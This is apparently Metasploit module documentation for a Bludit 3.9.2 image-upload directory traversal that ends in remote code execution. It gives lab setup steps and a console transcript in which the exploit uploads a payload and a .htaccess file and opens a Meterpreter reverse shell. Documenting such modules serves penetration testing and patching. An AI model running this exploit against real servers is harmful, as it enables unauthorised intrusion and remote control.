# Bludit Directory Traversal Image File Upload Vulnerability

## Description

This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by [christasa](https://github.com/christasa) in the image uploading feature. A remote user could abuse the `uuid` parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom `.htaccess` file to bypass the file extension check, and finally get remote code execution.

## Setup

1. Set up a Ubuntu box with Apache, PHP, and MySQL.
2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
3. Follow the installation guide [here](https://docs.bludit.com/en/getting-started/installation-guide). Make sure your Apache server sets `AllowOverride All` in /etc/apache2/apache2.conf.

## Scenarios

```
msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 172.16.135.162:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess
```